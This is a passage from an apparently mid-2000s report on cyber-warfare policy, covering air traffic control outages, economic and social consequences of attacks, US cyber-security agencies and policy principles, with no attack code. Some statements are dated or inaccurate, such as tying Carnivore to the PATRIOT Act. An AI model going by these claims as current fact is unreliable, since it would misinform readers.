http://www.computer.org/portal/site/ieeecs/menuitem.c5efb9b8ade9096b8a9ca0108bcd45f3/index.jsp?&pName=iee

ecs_level1&path=ieeecs/ReadyNotes&file=s_k_sample.xml&xsl=generic.xsl& 164

Yeh, Y.C. (2001).Safety critical avionics for the 777 primary flight controls system. Digital Avionics Systems. 1,

1-11. 165



Organization.

69

Some vulnerabilities found by the GAO were a result of outdated or poorly configured

computers. In one case, a computer system’s operating system had been unpatched since 1991

despite several vulnerabilities; in many other cases patches were not applied consistently or

quickly enough. Networks were not configured to prevent intrusion or denial-of-service

attacks—though a fix was in progress at the time of the report—and intrusions were not traceable

to a specific user or location.

Other problems found by the GAO were related to the staffing policies of the FAA and user

access permissions. For example, the FAA relies on outside contractors for much of its

information technology, and access to sensitive areas of the computer systems was often granted

when it wasn’t necessary for a worker to perform their job. There was little segregation between

software development, testing, and production control—another issue the FAA had plans to

fix—meaning developers could introduce malicious code.

However, while vulnerabilities to intrusion and malicious code exist, the same report stated that

the nature of the FAA’s computer systems makes them somewhat less susceptible to a cyber-

attack. The systems are highly proprietary and out-of-date relative to typical computer systems,

meaning they are more vulnerable to an attack from within the agency than from an outsider or

from the average hacker.

While the FAA does, as the GAO report states, rely on computer systems to ensure “safe, orderly

and efficient” air transportation, it isn’t clear that any physical damage would result from cyber-

attacks on air traffic systems. According to the Center for Strategic & International Studies, if

computer networks are unavailable, backup communications equipment exists which isn’t

dependent on the Internet, and air traffic’s “control and decision making process” includes a

“high level of human involvement” that reduces the potential damage of a cyber-attack.

Furthermore, pilots are trained to operate aircraft without support from air traffic control in

emergency situations 166

and modern commercial aircraft include automatic collision avoidance

systems.

Case studies help reveal the realistic impact that would result from a cyber-attack on aviation

systems. In 1997, a juvenile hacker disabled the local phone service in Rutland, Massachusetts,

resulting in the disabling of the air traffic control tower’s main radio transmitter at Worcester

Regional Airport for six hours. 167

No accidents, close calls or disruptions were reported at the

airport, which handled an average of about 165 flights per day that year, but this demonstrates

how vulnerable systems have been in the past.

In September of 2004, the FAA servers that allowed air traffic controllers in Southern California

to communicate with the 800 airplanes aloft in their airspace crashed for three hours. Planes that

had not taken off were held on the ground and delayed or cancelled.168

Air traffic controllers

affected by the server crash used their cell phones to pass control of the airborne planes to other

166

Lewis, J.. (2002). Assessing the risks of cyber terrorism, cyber war and other cyber threats Washington, D.C.:

Center for Strategic & International Studies. 167

Thomas, Pierre (1998). Teen hacker faces federal charges. Retrieved October 25, 2007, from CNN.com Web site:

http://www.cnn.com/TECH/computing/9803/18/juvenile.hacker/index.html 168

Wald, M.L. Air control failure disrupts traffic. (2004, September 15). New York Times.

70

FAA facilities. There were no accidents, but there were five incidents of planes traveling more

closely than normal; in the closest call, two planes were separated horizontally by one mile.169

This demonstrates that while temporary disruptions to air traffic control do not overwhelmingly

increase the risk of an accident, the risk is still greater than during normal operation.

A similar incident happened at the FAA’s Memphis Control Center in September of 2007, when

radar and phone communication were lost for two hours. Again, when their capabilities to

communicate directly with aircraft was lost, air traffic controllers handed control of the planes in

their 100,000 square miles of airspace to seven adjacent control centers via cell phone. No

accidents or close calls resulted. There were many delayed flights, but few cancellations; out of

740 flights that day, Northwest Airlines cancelled 13 and diverted 19.

One possible cyber-attack scenario would involve the insertion of malicious code into FAA

software, either by a renegade FAA employee or contractor or by remotely accessing FAA

servers. There is not much available research into what the worst-case effects of this could be—

possibly for national security reasons—but it is conceivable that the air traffic control system

could be disabled. Another possible cyber-attack could target communication systems such as

local phone systems or power systems that air traffic control centers rely on.

The effects of these kinds of attack would be similar to those of the case studies previously

discussed. The affected areas of the national air traffic system would put a hold on departing

flights, and the flights in the air would most likely be managed by air traffic control centers that

were still operational. Any delays and cancellations would have economic consequences in

proportion to the duration and scope of the shutdown, and public confidence could erode in any

scenario. The worst case scenario, in which all air traffic control centers would be disabled for

an extended period of time, is purely speculative and highly unlikely, given the distributed and

redundant nature of the air traffic system.

It is also conceivable that a cyber-attack could be used to disable some component of the air

traffic control system in conjunction with a more traditional form of attack. For example, if

every FAA control center were disabled while a plan was hijacked, it is conceivable that more

damage could result. While this sort of total collapse of the FAA’s control network would be

completely without precedent and is purely speculative, it is not known to be impossible.

However, these combined cyber and traditional attacks on aviation are the subject of little

research, and it is unclear how much of a negative effect the system being disabled would

realistically add to the conventional attack.

3.4.4 Conclusions

In all areas of the nation’s transportation infrastructure, the threat currently posed by cyber-

warfare is significantly smaller than that posed by conventional methods of attack. Public transit

systems are currently not reliant on computer systems enough to be an attractive target to cyber-

attackers. Similarly, shipping networks’ vulnerability to cyber-attacks are limited at present, and

169

Mullen, M. (2004, September 16). Human error caused chaos in the sky. Retrieved October 25, 2007, from

MSNBC Online Web site: http://www.msnbc.msn.com/id/6021929/

71

any cyber-attack on shipping networks would need occur in conjunction with a conventional

attack to cause major damage. Also, there are enough glaring physical vulnerabilities that

attackers would be less likely to focus on cyber-warfare on shipping networks.

In the case of the nation’s aviation network, the air traffic control system has several major

vulnerabilities to cyber-attacks that should be addressed, as demonstrated by previous incidents.

However, because of the degree of redundancy and human involvement present, the potential

physical damage caused by cyber-attacks is unlikely to approach the damage conventional

attacks can cause. This makes cyber-warfare a less favorable tool for aggressors, especially if

not used in conjunction with some form of traditional attack.

At present, the primary effects of a cyber-attack on the transportation infrastructure would be

economic, not physical. However, as systems become more dependent on computer systems,

they will be inherently more vulnerable to cyber-attacks, and the effects may become more

severe. This means cyber-security should remain central to the development of transportation

systems.

72

4 Consequences

73

4.1 Economic Consequences of Cyber-Warfare

It is difficult to quantify the economic effects of cyber-warfare because the scale of such attacks

varies widely. Assumptions must be made on the degree of success of attacks and their

consequences must then be analyzed. Previous attacks and electronic disruptions provide insight

on potential costs.

4.1.1 Economic Consequences of Hacking

Cyber-warfare incidents can be costly even when conducted by small groups of attackers. A

group of 12 people led by Jonathan Bosanac from San Diego “hacked into a digital cache of

unpublished telephone numbers at the White House, portions of the national power grid, air

traffic control systems, the FBI’s National Crime Information Center, credit-reporting databases,

and telephone networks such as MCI, WorldCom, Sprint, and AT&T.” These 12 attackers cost

the United States and businesses an estimated $1.85 million.170

In 1999, a computer hacker from New Jersey created a virus called “Melissa” that spread through

thousands of computers through email. The virus attacked personal, government and corporate

computers using an “X-rated Web site.” This computer virus alone, created by one man, caused

an estimated $80 million.171

A virus called “I Love You”, created in 2000, caused $10 billion in

damage. When “Love-Letter-For-You.txt.vbs” was opened from a recipient’s email, the virus

would copy itself onto three locations in the computer, initiating various start-up commands

upon computer boot-up, and sending itself as an attachment to addresses in the recipient’s

address book.172

This virus was created by a single PhD thesis-rejected student in the

Philippines.

4.1.2 Economic Consequences of Infrastructure Attacks

There are many critical infrastructures that could be attacked and result in economic damage, but

there are two sectors that are more significant individual threats.

The transportation system is an appealing target to potential cyber-attackers due to the integral

role they play in the economy. Transportation accounts for over 10 percent of the nation’s gross

domestic product. The recent history of conventional terrorism also suggests that cyber-attackers

may choose to target transportation systems, provided feasible opportunities exist. Eighteen of

the twenty-five major terrorist attacks from 1983 to 2001 “involved the use of transportation

vehicles as weapons, and another five involved attacks on planes.”173

170

Dot.Con: The Dangers of Cyber Crime and a Call for Proactive Solutions. Granville, J. Australian Journal of

Politics & History. March, 2003, Vol. 49 Issue 1. Pg. 104 171

Ibid 172

Ibid 173


74

The FAA estimates that the air transportation industry accounts for 5.4 percent of the nation’s

GDP. On an average day, nearly 2 million passengers fly in U.S. airspace, and up to 7,000

civilian and military aircraft are aloft over the U.S. at any given time174

. Only one would need to

be targeted in a cyber-attack for an impact to be felt on the economy and public perception, even

if the attack did not result in physical damage.

A successful attack on the power grid presents the greatest economic threat among critical

infrastructures. An Independent Task Force under the Council of Foreign Relations describes in

a report how vulnerable the power grid really is. Refined oil would be a likely target, as “A

coordinated attack on several key pumping stations- most of which are in remote areas, are not

staffed, and possess no intrusion-detection devices- could cause mass disruption to these flows.

Nearly 50 percent of California’s electrical supply comes from natural gas power plants, and 30

percent of California’s natural gas comes from Canada. Compressor stations to maintain

pressure cost up to $40 million each and are located every sixty miles on a pipeline. If these

compressor stations were targeted, the pipeline would be shut down for an extended period of

time. A coordinated attack on a selected set of key points in the electrical power system could

result in multi-state blackouts. While power might be restored in parts of the region within a

matter of days or weeks, acute shortages could mandate rolling blackouts for as long as several

years.”175

Even with a new advanced backup power source installed in December of 2006, the

system is only expected to last for 4 months.176

The cost of power outages alone is tremendous, not to mention public confidence and effects on

critical infrastructures. “The average cost of a one-second outage among industrial and DE firms

is $1,477, vs. an average [per second] cost of $2,107 for a three minute outage and $7,795 for a

one-hour outage.”177

These figures demonstrate that the average cost per second increases as the

duration of the power outage increases. The New York power outage that lasted only one day

cost the United States an estimated $6 Billion.178

An extended outage for one company alone

could cost approximately $5 million dollars per month. Considering that there are thousands of

distributed energy firms in any given region of the U.S., these figures could approach one trillion

dollars per month. An impact this big on the U.S. economy affect almost every citizen in the

country.

174

FAA Air Traffic Organization. (2006). Moving America safely: 2005 annual performance report Washington,

D.C.: Federal Aviation Administration. 175

http://www.cfr.org/content/publications/attachments/Homeland_TF.pdf 176

http://www.buyerzone.com/facilities/generators/rbic-taking-stock.html 177

Lineweber, David and Shawn McNulty (2001). “The Cost of Power Disturbances to Industrial & Digital

Economy Companies”. Electric Power Research Institute, Inc. 30 Oct 2007. <http://www.epri-

intelligrid.com/intelligrid/docs/Cost_of_Power_Disturbances_to_Industrial_and_Digital_Technology_Companies.p

df> 178




75

4.1.3 Economic Consequence of Combined Attacks

Even more costly than an attack on the power grid would be a coordinated attack on multiple

systems. The various sectors of the current critical infrastructures in the U.S. are extremely co-

dependent. Oil refineries, power plants, dams, water treatment plants, security operations, and

many other infrastructures all depend on the internet and a constant electric power source. The

loss of these interconnected systems could cascade and result in immense economic

consequences. In November, 2004, a project conducted by the Department of Energy with the

code name “Black Ice” revealed the interdependencies between critical infrastructures. The

exercise showed how an ice storm that knocks out a major portion of the power grid would first

disrupt telecommunications systems, and later water supply, natural gas supply, and even

emergency response systems.179

When one considers the possibilities of organizational attacks and the compounding effect of the

loss of public confidence, the potential economic impact rises dramatically. This loss of

confidence would be the exact target of a terrorist organization. Terrorists aim “to create fear by

causing confusion and uncertainty within a given population… (Terrorist organizations)

generally use symbolic means to attack the sanctity of the society… Such actions result in

confusion and uncertainty about a government’s ability to protect its citizens. This is when

citizens are most vulnerable to influence by others.” Not only could they receive media attention

for their efforts, the terrorist would also accomplish degrading the economic systems as the

population lost confidence in the market of such a vulnerable nation.180

If there was a

coordinated attack on a combination of systems in a large region, the estimated economic

impacts approach two trillion dollars.

179

http://archives.cnn.com/2001/TECH/ptech/10/21/black.ice.idg/index.html Utah’s ‘Black Ice’: Cyber-attack

scenario. Verton, Dan. October 21, 2001. 180

“National Infrastructure Protection Center Highlights”. National Infrastructure Protection Agency. 15 June

2001, p. 2. 30 Oct 2007 <http://www.iwar.org.uk/infocon/nipc-highlights/2002/highlight02-03.pdf>

Figure 4.1

http://archives.cnn.com/2001/TECH/ptech/10/21/black.ice.idg/index.html

76

4.2 Social Effects

The negative effects of cyber-attacks extend far beyond damage to the economy, particularly in

the case of cyber-terrorism. Currently, no one has ever launched a successful cyber-attack on the

United States, so the social effects of such an attack are purely speculative. Because the Bush

administration categorizes cyber-attacks along with chemical, biological, nuclear, and other

major attacks, the only attack large enough to act as a point of comparison is the September 11th

World Trade Center attacks. However, because the effects of a cyber-attack could vary greatly,

this comparison is tenuous at best: the public’s reaction could differ greatly between a cyber-

attack that causes widespread erasure of credit card information but caused no direct fatalities,

and a cyber-attack that opened a dam’s floodgates and killed thousands. Nevertheless, it is likely

that a successful act of cyber-war or cyber-terrorism on the United States would have profound

social effects, particularly in terms of public confidence in the government and in the area of

infrastructure affected by the attack.

4.2.1 Public Confidence in the Government

There is a great deal of speculation among cyber-security professionals whether the United

States government is undereducated about the capabilities of cyber-attacks. According to Joe

Weiss, a consulting executive for KEMA Inc, this likely stems from ignorance within the

information technology industry itself about how well many systems are protected . Weiss

claims that materials that have reached Senate and congressional staffers about cyber-security

were technically flawed and lacking important basic information; one report about SCADA

systems’ threat to infrastructure that even to identify that the electrical industry uses SCADA

systems181

. Many cyber-security industry professionals feel that because of this ignorance in

Washington, neither enough attention nor funding is given to measures that could secure our

country from cyber-attacks. The public itself is also uneducated about cyber-security: a National

Cyber Security Alliance poll from October 2007 shows that of the 87% of computer users who

said they use anti-virus software, 48% had not updated their software within a month.

Furthermore, 81% of respondents had a firewall installed on their computer, but only 64%

actually used the firewall182

. These discrepancies indicate a universal need to increase awareness

and education about cyber-warfare and cyber-security in both the public and private sectors.

However, it is not entirely accurate to say that the Bush administration has not taken any action

to improve the nation’s cyber-security. In terms of budgeting, between 2002 and 2004, the

government increased the fiscal year budget federal records protection from $2.7 billion to $4.9

billion, and the National Strategy to Defend Cyberspace laid out a defense plan around which

further budgeting could be based. Despite these budget increases to federal cyber-security,

critics say that the government is still not giving infrastructure enough funding to allow

companies to make the changes outlined in the defense plan183

. Furthermore, polls show that the

181

"Interview: Joseph Weiss." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/weiss.html>. 182

"Report Reveals Perception Gap in Cyber Security Awareness." Security Products 2 Oct. 2007. 20 Oct. 2007

<http://www.secprodonline.com/articles/50717/>. 183

"Interview: Richard Clarke." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/clarke.html

77

majority of Americans, both Republican and Democrat, agree that Congress should pass a

“strong data security law184

.”

The public has shown in the aftermath of September 11th

that it quickly loses faith in the

government if there is evidence that a legitimate threat to national security is ignored. A 2004

poll shows that 49.3% of New York City residents and 41% of New York state citizens believed

that the government had foreknowledge of the September 11th

attacks185

in the wake of

speculation that the Clinton and Bush administrations ignored warnings of the attacks. This

weakening faith in the government is partially reflected in presidential approval ratings, which

have fallen steadily since 2001186

. Industry experts have repeatedly warned the government to

bolster cyber-security, even asking for a cyber-security initiative on the scale of the Manhattan

Project187

. While a concrete plan to launch a cyber-war on American interests has not been

identified, the public could have a similar response to the government’s failure to heed the

experts’ warnings if a successful cyber attack large enough to garner national attention were

successfully launched

4.2.2 Public Confidence in Target

Currently, the public seems to have little faith in businesses concerning cyber-attacks: a 2006

Cyber Security Industry Alliance poll found that only 24% of Americans felt that businesses

were properly emphasizing protection for information systems and networks188

. The poll mainly

asked about e-commerce, but the security systems used by infrastructure companies are often the

same as those used by corporations. Statistics show that since 2001, sales of cyber-security

implements have not increased due to increased corporate awareness of cyber-security threats,

and most critical infrastructure networks are still unprotected from many types of cyber-attack189

.

In general, many experts believe that the public is not as concerned about cyber-attacks as

physical attacks because their effects are not as tangible; most people are not aware of the extent

to which our society’s infrastructure relies upon computers. Moreover, most cyber attacks would

not be as “flashy” as physical attacks—a cyber-attack on California’s power grid, for example,

might have similar effects to the brownouts of 1998, which caused economic distress but not

terror or widespread panic. Most experts agree that a large scale cyber-attack on the United

States power grid is the “nightmare scenario,” but some disagree about the feasibility of such an

attack. Former White House cyber-security advisor Richard Clarke concedes that it would be

184

"Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance

(2006): 30. 21 Oct. 2007

<https://www.csialliance.org/news/pr/view?item_key=e5b543c0cf207bb110c9c65b61ac476ec45e03fe>. 185

"Poll: 50% of NYC Says U.S. Govt Knew." 30 Aug. 2004. Zogby International Polling/Market Research. 28 Oct.

2007 <http://www.911truth.org/article.php?story=20040830120349841>. 186

Ruggles, Steven. Historical Bush Approval Ratings. Dept. of Hist., U. of Minnesota. 2007. 27 Oct. 2007

<http://www.hist.umn.edu/~ruggles/Approval.htm>. 187

"Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007


"Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance

(2006): 30. 21 Oct. 2007

<https://www.csialliance.org/news/pr/view?item_key=e5b543c0cf207bb110c9c65b61ac476ec45e03fe>. 189

Hancock, Bill. National Infrastructure Protection Issues. International Telecommunication Union. 2002. 25 Oct.

2007 <http://www.itu.int/osg/spu/ni/security/workshop/presentations/cni.18.pdf>.

78

possible to bring down the national power grid for a day or two, but it is “unrealistic” to think

that the grid could be taken down for a longer period. On the other hand, Cyber Defense Agency

CEO Sami Saydjari claims that a targeted attack requiring about 300 people and $500,000 could

be capable of bringing down the national power grid for a month or more190

.

Current trends in public knowledge about cyber-security and industries’ hesitance to disclose that

they have experienced small-scale cyber-attacks suggest that only cyber-attacks on a very large

scale would actually receive public attention. For example, despite the successful disruption of

air traffic control systems as recently as September 2007, there is no data to suggest that these

cyber-incidents have discouraged the public from using commercial airlines. The only ways the

public would likely have a strong, noticeable response against a company or section of

infrastructure are if a cyber-attack of a large magnitude were to be launched, or if there were any

successful cyber-attack that resulted in civilian casualties. If the public became aware of such an

attack, the response would likely be similar to the public’s apprehension about using airlines

immediately after September 11. Those attacks resulted in an immediate 30% decline in demand

for commercial airline services, and an ongoing 7.4% decline through 2003191

. A successful

attack or a prolonged series of unsuccessful attacks would probably result in the same pattern: an

immediate decline in public confidence, with a smaller prolonged loss of public confidence if no

other incidents occurred.

190

"Interview: O. Sami Saydjari." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007




<http://www.brown.edu/Departments/Economics/Papers/2003/2003-16_paper.pdf>.

79

5 National Agencies and Legislation

80

In order to coordinate an effort to secure cyberspace through federal initiatives, various

documents have been created to define and dictate how the government prepares for and reacts to

cyber-attacks. Also, several agencies have been created to regulate this information and ensure

that communication and awareness achieve cyber-security objectives. It is the responsibility of

various departments within the federal government to abide by these documents and agencies.

5.1 E-Government Act of 2002

The E-Government Act of 2002 serves as an origin to the government’s current role in cyber-

warfare. Enacted on December 17th

, 2002 (Public Law No: 107-347)192

, one of the main

attributes of this act is the role established for the Office of Management and Budget (OMB).

The Director of OMB is required by FISMA (Federal Information Security Management Act193

)

to oversee federal agency information security policies and practices as well as coordinate a

thorough risk-based approach for managing information security issues. Also, the OMB oversees

the operation of a central federal information security incident center, formerly known as

FedCirc. This sector is now known as US-CERT and will be discussed later in the report. The

OMB, through US-CERT, provides guidance to Federal agencies on types of cyber-attacks and

ways to report and communicate them throughout the government.

Another key point in the E-Government Act of 2002 is to allow government agencies to use

technology as a way of obtaining secure government information. Furthermore, the Act lists

ways in which several departments are responsible for satisfying the need for cyber-warfare

strategies.

Finally, the Act suggests that a Critical Infrastructure Protection Policy Coordinating Committee

will advise the Homeland Security Council on policy amongst agencies related to protection

against cyber attacks. This Committee is now known as the NIAC. Passed on December 17,

2003, the Homeland Security Presidential Directive offers suggestions regarding the

responsibility of several governmental agencies.

5.2 National Infrastructure Advisory Council

The National Infrastructure Advisory Council (NIAC), formerly known as the President’s

Critical Infrastructure Protection Board, operates within the U.S. Department of Homeland

Security. The purpose of this council is to supply the President with enough information and

advice to continue to secure critical infrastructure sectors and their information systems.194

Consisting of 30 members maximum, the NIAC is composed of citizens appointed by the

President from various areas such as private industry, academia, state, and local government.

192

Bush, George W., and Jim Turner. "E-Government Act of 2002." The White House. 15 Nov. 2002. US

Government. <http://www.whitehouse.gov/omb/egov/g-4-act.html>. 193

"FISMA." National Institute of Standards and Technology. 24 Oct. 2002. US Government.

<http://csrc.nist.gov/groups/SMA/fisma/>. 194

"National Infrastructure Advisory Council." Department of Homeland Security. Oct. 2007. US Government.


81

The NIAC focuses mostly on preventing attacks on critical infrastructure as well as recovering

from attacks. The NIAC notes that both cyber and physical functions of critical infrastructure are

vital in maintaining American economy, security, and way of life. Currently, the federal

government has divided the responsibility of cyber infrastructure into several different

departments. However, it should be noted that the devices that control our physical systems,

such as power grids, are increasingly dependent on the Internet. As a result, a cyber-attack has

the ability to affect several areas.

5.3 National Strategy to Secure Cyberspace

The National Strategy to Secure Cyberspace, also known as NSSC, is meant to inform and

implore Americans to secure the sections of cyberspace that they own, operate, control, or

utilize.195

The idea of securing cyberspace is a challenge that requires effort and awareness from

the federal, state, and local governments, as well as the private sector and the American citizens.

This document, published in February of 2003, can be seen as an interpretation of the National

Strategy for the Physical Protection of Critical Infrastructure and Key Assets in terms of cyber-

protection. Policies and guidelines found in both documents are represented in the missions of

both federal and private agencies concerned with cyber-attacks.

5.4 United States Computer Emergency Response Team (US-CERT)

United States Computer Emergency Response Team, also known as US-CERT, was created

shortly after the release of the National Strategy to Secure Cyberspace. It allows the

combination of federal and private sectors to relay information about cyber incidents and

situations.196

US-CERT was established for the sole purpose of protecting the Internet against

and responding to cyber-attacks. One key component of US-CERT is the Einstein Program,

which enables the effective communication of cyber-incidents.

5.4.1 US-CERT Einstein Program

The Einstein Program allows agencies of the federal government to effectively distribute

information about cyber-attacks so that they can be analyzed and shared between agencies.197

This is significant because, due to the complexity and integration of the Internet in almost every

critical infrastructure, many agencies find it difficult to relate any information without a uniform

institution to assist in communication. By collecting information from participating federal

195

National Strategy to Secure Cyberspace. Feb. 2003. US Government.

<http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>. 196

"United States Computer Emergency Readiness Team." Department of Homeland Security. US Government.

<http://www.uscert.gov/>. 197

"Privacy Impact Assessment EINSTEIN Program Collecting, Analyzing, and Sharing Computer Security

Information Across the Federal Civilian Government." US-CERT. Sept. 2004. Department of Homeland Security.

<http://www.dhs.gov/xlibrary/assets/privacy/privacy_pia_eisntein.pdf>.

82

agencies, US-CERT is able to build and enhance America’s cyber-related situational awareness.

Likewise, the increase in awareness will help in identifying and responding to cyber-threats and

attacks. Also, the more information known about these attacks, the easier it is to improve

network security, increase the resilience of electronically delivered government services, and

enhance the survivability of the Internet.

There are several ways in which the Einstein program helps federal agencies protect themselves

from cyber-attacks. The program is able to determine the scope and possible threat of a specific

worm and how it relates to both the federal government and the Internet community. Also,

detection of irregular network behavior is possible through the Einstein program, which is then

able to take this information and determine whether the possible attack is focused or part of a

larger Internet-related attack. Likewise, specific agencies tend to have internet traffic problems

that may be attributed to outside cyber attacks.

One of the most useful aspects of the Einstein program that US-CERT developed was its ability

to decide how invasive and threatening an attack is, and its resulting effect on the United

States.198

It is able to detect the source of an attack through the analysis of trends in cyber-

incidents and IP tracking. These trends are documented in close to real-time to raise awareness

about their existence amongst federal agencies.

5.4.2 Collaborative Groups of US-CERT

Government Forum of Incident Response and Security Teams (GFIRST) –

Comprised of over 50 incident response teams199

, GFIRST helps coordinate the action

and communication of several federal agencies in order to ensure the security of the

federal government.

Multi-State Information Sharing Analysis Center (MS-ISAC) – MS-ISAC gathers

information pertaining to how cyber-threats may effect critical infrastructure and then

relay that information with states and local governments.200

The significance of this

group is not only the amount of people involved in ensuring that communication is

adequate, but also in providing a means to raise awareness and response to possible

cyber-attacks. MS-ISAC is composed of volunteers that have formed their

organization based on the needs discussed in the National Strategy to Secure

Cyberspace.

198

"Fact Sheet: Protecting America’S Critical Infrastructure – Cyber Security." US-CERT. Department of

Homeland Security. <http://www.us-cert.gov/press_room/050215cybersec.html>. 199




cert.gov/federal/collaboration.html>.

83

National Cyber Response Coordination Group (NCRCG) – Initially intended to join

the Department of Defense with the Department of Justice in efforts to defend against

cyber attack, NCRCG is the federal government’s main interagency organization that

focuses on responding to and recovering from cyber-attacks that affect national

security.201

5.4.3 National Cyber Security Division (NCSD)

The National Cyber Security Division (NCSD) works collaboratively with public, private, and

international entities to secure cyberspace and America’s cyber-assets.202

The National Cyber

Security Division continuously seeks to protect the critical cyber-infrastructure in order to ensure

a steady surveillance is kept for possible cyber-attacks.

5.4.3.1 National Cyberspace Response System

The National Cyberspace Response System coordinates the protocols that determine when and

what actions may need to be taken in response to cyber-attacks.

Cyber Security Preparedness and the National Cyber Alert System – Due to the lack

of awareness of cyber-threats, many citizens do not actually know whether their

computer systems are secure, despite the level of security they think they have. Cyber-

threats are constantly adapting to overcome new security measures. The Cyber Security

Preparedness and National Cyber Alert System both help in raising the awareness among

citizens to try to reduce the susceptibility of their networks. Anyone can sign up to be

alerted by these systems if new and significant information is obtained regarding cyber-

threats.

US-CERT Operations – As mentioned above, the US-CERT is one of the most

significant organizations that both analyzes and standardizes the level of threat each

cyber-attack may have. The US-CERT makes it easier to determine the significance of a

possible attack through its well thought-out and established method of prioritizing

attacks.

National Cyber Response Coordination Group – A group that interacts with US-

CERT, the NCRCG’s significance can be noted above. In terms of response, NCRCG is

significant due to its participating 13 federal agencies that help determine what response

is necessary in case of an attack. The NCRCG helps coordinate federal response, law

enforcement, and the intelligence community in the case of an attack.

201



"National Cyber Security Division." Department of Homeland Security. 23 Sept. 2006. US Government.

http://www.dhs.gov/xabout/structure/editorial_0839.shtm.

84

Cyber Cop Portal – Meant to share information amongst over 5,500 investigators

worldwide, the Cyber Cop Portal helps find and convict the people responsible for cyber-

attacks.

5.4.3.2 Cyber Risk Management Programs

The National Cyber Security division is able to evaluate the risk and determine what kind of

protective measures are necessary to secure cyberspace. The following three programs are a part

of the Cyber-Risk Management Program:

Cyber Exercises: Cyber Storm – Cyber Storm began in February of 2006 in order to

evaluate the preparedness in response to a cyber-attack. The Department of

Homeland Security used Cyber Storm to determine how equipped the federal

agencies were in case an attack were to happen. Also, DHS used the Cyber Storm

exercise in private and international sectors. The significance of the idea of involving

private sectors shows how defense against cyber attacks is both a government and

industrial responsibility.

National Outreach Awareness Month – October of every year is known as the

National Outreach Awareness Month and is meant to raise awareness of the threat of

cyber-attacks.

Software Assurance Program – Intended to lessen the susceptibility of software

programs, SAP also suggests ways to improve the development and installation of

software products.

85

6 Policy

86

6.1 National Policies

The United States Government has recently dedicated a portion of the Department of Homeland

Security to securing and protecting Americans from cyber-attacks. Current policies and guiding

principles are vital to determine the progress the government has made in ensuring that its

citizens are protected from cyber-attacks. The establishment of agencies to protect and raise

awareness against cyber-attacks has proliferated throughout the Department of Homeland

security, but many flaws and a lack of funding to these agencies has still shown the need for a

more cooperative support against possible cyber-offenses.

The current national policy, The National Strategy to Secure Cyberspace (NSSC), outlines the

direction for current government policy for dealing with cyber-warfare. The current policy from

NSSC has operated as a baseline for the following policy analysis, with additional policy

suggestions included.

Current national policies regarding the ways in which the federal government has mandated how

to secure cyberspace are to:203

Prevent cyber attacks against our critical infrastructures

Reduce our national vulnerabilities to cyber attack and

Minimize the damage and recovery time from cyber attacks that do occur. Ensure the

federal government’s ability to perform essential national security missions and guarantee

the general public’s health and safety

Make sure that state and local governments are able to maintain order and to deliver

minimum essential public services

Aid in the private sector’s capability to ensure the orderly functioning of the economy and

the delivery of essential services and

Support the public’s morale and confidence in our national economic and political

institutions.

6.2 Policy Goals

Although the NSSC was used as a starting point, the current government policy is not enough to

protect our nation from cyber-warfare. First we will discuss guiding principles to keep in mind

as the government defines a new policy, as well the primary stakeholders for our policy. Our

policy discussion will then be broken into six major areas:

Prevention

Response

Security Training and Awareness

203

"National Policy and Guiding Principles." National Strategy to Secure Cyberspace. Feb. 2003. US Government.


87

Government Cyber-security

International Cyber-warfare

Military Uses of Cyber-warfare

6.3 Guiding Principles

Any cyber-security policies that the government decides to enact should not only minimize or

prevent disruptions in critical infrastructures to protect American national security, but also

adhere to some guiding principles to protect civil liberties and ensure cooperation from all

sectors.

One such guiding principle is the idea that American cyber-security must be a national effort.

Thus, the government must work with private and commercial groups to formulate policies that

are both technologically sound and agreeable to all parties. In doing this, any policies the

government employs must strengthen cyber-security regarding personal privacy, rather than

infringing upon privacy. Outside privacy analysts and experts should frequently be consulted to

ensure that nonpublic information is handled reliably and privately.

Another guiding principle is that in most cases, the government should avoid mass regulation of

cyber-security. Setting a mandate for how corporations must protect their networks would create

a “lowest common denominator approach to cyber-security,” which could easily be exploited on

a widespread scale. Currently, some federal regulatory agencies have guidelines for cyber-

security, but in the private sector, the market itself should force the evolution of cyber-security

technologies.

Furthermore, because of the rapidly-changing nature of cyber-threats, it is essential that all

cyber-security policies be flexible in their ability to prevent and respond to attacks. Flexible

policies allow both government and corporate organizations to reassess threats and plan

protection strategies based on growing and changing threats. Because these threats are

constantly growing, it is essential that government agencies form long term (multi-year) plans for

updating cyber-security so that they can sustain their roles in protecting American national

security. It is also recommended that other public- and private-sector organizations also adopt

long-term plans for this reason.

6.3.1 Social Considerations

In formulating policies to protect against cyber-attacks, there is the potential for negative social

consequences. One such consequence is the loss of privacy in cyberspace, which has already

occurred as the result of some government security policies. From 2000-2001, the FBI used an

email-surveillance system called Carnivore, a byproduct of the US PATRIOT Act, which

operated as a basic packet-sniffer, to monitor the electronic transmissions on the networks of

Internet service providers. However, this system and systems like it could violate federal privacy

laws and the United States Constitution’s ban on unreasonable searches and seizures. The

Carnivore system intercepted the traffic of all users on whatever network it was connected to, a

practice which former federal prosecutor Mark Rasch describes as “the electronic equivalent of

88

listening to everybody's phone calls to see if it's the phone call you should be monitoring.”

Though the warrantless wiretapping system was reportedly discontinued, it serves as a warning

of the social hazards that can result from implementing badly-planned policies.204

In addition to monitoring Internet traffic, the government could also decide to block access to

certain websites. For example, the European Union recently signed legislation to block access to

websites with information about bomb-making. The Australian government is planning to allow

the Australian federal police to compile a list of websites suspected to be related to terrorism that

will be mandatory to be blocked by Internet filters. In the wake of these international events, the

United States has argued before a federal court that it has the right to restrict access to legal

websites that are hosted anywhere in the world. Beyond the risk to civil liberties, restricting

international content could cause an “arms race” over Internet censorship: if the United States

has the right to block information from other countries, then those other countries can directly

censor information based in the United States as well.205

Due to the dangers to privacy, it is important that the public and private sectors are dealt with as

independent but cooperating entities when forming cyber-security policies. While the federal

government must develop the cyber-security technologies that provide a basis for the public, the

private sector generally develops these security products and is responsible for adhering to good

security practices themselves. For example, the Global Information Grid, a multibillion dollar

military project to link weapons, intelligence, and personnel, interconnects with networks in the

